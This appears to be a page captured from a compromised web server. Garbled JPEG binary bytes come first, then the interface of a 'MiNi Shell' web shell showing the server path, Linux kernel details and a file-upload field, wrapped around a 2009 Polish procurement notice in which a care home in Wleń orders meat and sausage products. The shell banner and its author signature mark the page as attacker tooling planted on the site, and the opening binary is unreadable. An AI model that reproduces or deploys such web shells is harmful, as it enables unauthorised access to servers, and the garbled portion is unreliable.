JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090317/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090317/65810-N-2009.html

<p class="kh_header"><b>Wleń: Produkty zwierzęce, mięso i produkty mięsne</b><br>
<b>Numer ogłoszenia: 65810 - 2009; data zamieszczenia: 17.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , Nielestno 17, 59-610 Wleń, woj. dolnośląskie, tel. 0-75 7136402, 7136342, faks 0-75 7136342.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpsnielestno.powiatlwowecki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Produkty zwierzęce, mięso i produkty mięsne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykaz artykułów  						


Lp.	Rodzaj asortymentu	Symbol CPV	Ilość w kg	Cena netto	Wartość netto	Cena brutto	Wartość brutto	VAT %
1.	Mięso wieprzowe z/k szynka	15113000-3	55					
2	Mięso wieprzowe b/k szynka 	15113000-3	10					
3.	Mięso wieprzowe łopatka z/k	15113000-3	400					
4.	Mięso wieprzowe z/k karkówka	15113000-3	440					
5.	Mięso wieprzowe z/k schab  	15113000-3	330					
6.	Mięso wieprzowe żeberka -paski	15113000-3	400					
7.	Mięso wieprzowe boczek świeży chudy bez żeber 	15131220-3	55					
8.	Mięso mielone domowe -garmażeryjne	15131400-9	450					
9.	Mięso wieprzowe golonka tylnia	15113000-3	55					
10.	Mięso wieprzowe surowe -podgardle	15113000-3	55					
11. 	Słonina świeża bez skóry	15100000-8	25					
12.	Nogi wieprzowe	15113000-3	55					
13.	Głowy wieprzowe	15113000-3	55					
14.	Kości schabowe	15100000-8	55					
15.	Kości schabowe wędzone	1510000-8	25					
16.	Wątroba wieprzowa	15114000-0	35					
17.	Mięso wołowe zrazowe b/k	15111100-0	25					
18.	Flaki wołowe -krojone - podgotowane  	15111100-0	55					
19.	Kurczak świeży 	15112100-7	90					
20.	Piersi -filet z kurczaka b/k 	15112100-7	80					
21. 	Udko z kurczaka + podudzie/bez grzbietu/	15112100-7	475					
22.	Podudzie z kurczaka	15112210-1	150					
23.	Korpusy rosołowe z kurczaka	15112100-7	405					
24.	Żołądki drobiowe	15112300-9	100					
25.	Wątróbki drobiowe	15112300-9	100					
26	Smalec wieprzowy kostka	15113000-3	55					
27.	Kiełbasa biała parzona	15131130-5	45					
28.	Kiełbasa grilowa	15131130-5	110					
29.	Kiełbasa codzienna	15131130-5	220					
30.	Kiełbasa serbska	15131130-5	220					
31.	Kiełbasa śląska	15131130-5	220					
32.	Kiełbasa wiejska	15131130-5	100					
33.	Parówki śląskie 	15131130-5	170					
34.	Serdelki drobiowe		110					
35.	Kaszanka -z kaszy jęczmienne	1513113-3	200					
36.	Krupniok z kaszy gryczanej	1513113-3	55					
37.	Kiełbasa mortadela delikatesowa	15131130-5	180					
38. 	Kiełbasa mielonka	15131130-5	140					
39.  	Pieczeń Familijna	15131000-5	90					
40.	Pieczeń rzymska	15131000-5	90					
41.	Kiełbasa piwna	15131130-5	55					
42.	Kiełbasa żywiecka sucha	15131130-5	55					
43.	Kiełbasa podsuszana krakowska wieprzowa	15131130-5	55					
44.	Kiełbasa szynkowa wieprzowa	15131130-5	100					
45.	Szynka Babuni	15131210-5	55					
46.	Szynka wieprzowa gotowana	15131135-5	55					
47.	Baleron wędzony	15131200-7	55					
48.	Polędwica sopocka	15131133-6	90					
49.	Polędwica drobiowa	15131130-5	150					
50.	Wędzonka domowa	15131210-5	55					
51.	Blok golonka konserwowa 	15131000-5	120					
52.	Salceson ozorkowy	15131120-2	25					
53.	Salceson drobiowy	15131120-2	35					
54.	Blok przysmak drobiowy	15131000-5	125					
55.	Boczek faszerowany	15131120-2	120					
56.	Boczek wędzony parzony ekstra b/k	15131220-3	150					
57.	Boczek  wędzony parzony paski z/k	15131220-3	150					
58.	Lanchen Met	15131000-5	120					
59.	Pasztetowa  drobiowa 	15131135-0	55					
60.	Szynka z indyka 	15131135-0	55					
61.	Pasztet pieczony	15131000-5	55					
62.  	Blok szynka kanapkowa		120					
63. 	Łopatka pieczona 	15131120-2	120					
64.	Pasztet drobiowy pieczony	15131135-0	120					
	Razem :

	------	----	----		----.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy
nakładają obowiązek posiadania takich uprawnień (art. 22 ust. 1 pkt 1),
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i
osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia  (art. 22 ust 1 pkt2 ):
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
(art. 22 ust. 1 pkt 3),
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art. 22 ust. 1 pkt1- 4).
2. Zamawiający dokona oceny spełnienia powyższych warunków na podstawie dokumentów
złożonych zgodnie z działem IV SIWZ według formuły spełnia-nie spełnia.
3. Nie spełnienie powyższych warunków skutkować będzie wykluczeniem z postępowania.
4. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, których
wykonanie zamierza powierzyć podwykonawcom..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełnienia warunków udziału w postępowaniu oferta musi zawierać
następujące dokumenty:
1.1 oświadczenie o spełnieniu wymogów określonych w art. 22 ust. 1 ustawy Prawo
zamówień publicznych o treści zgodnej z określoną wg załącznika nr 2.
W przypadku oferty złożonej przez Wykonawców wspólnie ubiegających się o udzielenie
zamówienia ww. oświadczenie składa każdy z wykonawców składający ofertę wspólną.
W celu potwierdzenia że Wykonawca posiada uprawnienia do wykonywanej działalności lub
czynności oraz nie podlega wykluczeniu na podstawie art.24 ustawy z dnia 29 stycznia
2004r. Prawo zamówień publicznych
1.2 aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do
ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do
rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie
wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.3 Dla udokumentowania spełnienia wymaganych warunków oraz uznania formalnej poprawności - Oświadczenie potwierdzające , że oferowane artykuły są dopuszczone do obrotu na terenie Polski zgodnie z Ustawą o warunkach zdrowotnych żywności i żywienia oraz, że wykonawca posiada system HCCP lub rozpoczął wdrażanie Systemu HCCP w Zakładzie Załącznik 4
-Oświadczenie, ze osoby które zajmują się dostawą towaru posiadają aktualne badania do celów sanitarno-epidemiologicznych .Załącznik nr 5.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.dpsnielestno.powiatlwowecki.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej
Nielestno 17, 59-610 Wleń
tel. 075-7136402
fax 075-7136342.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2009 godzina 12:00, miejsce: 1. Oferty należy składać w sekretariacie Domu Pomocy Społecznej  w Nielestnie
terminie najpóźniej do dnia 26 marca 2009 r. do godz. 12.00..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com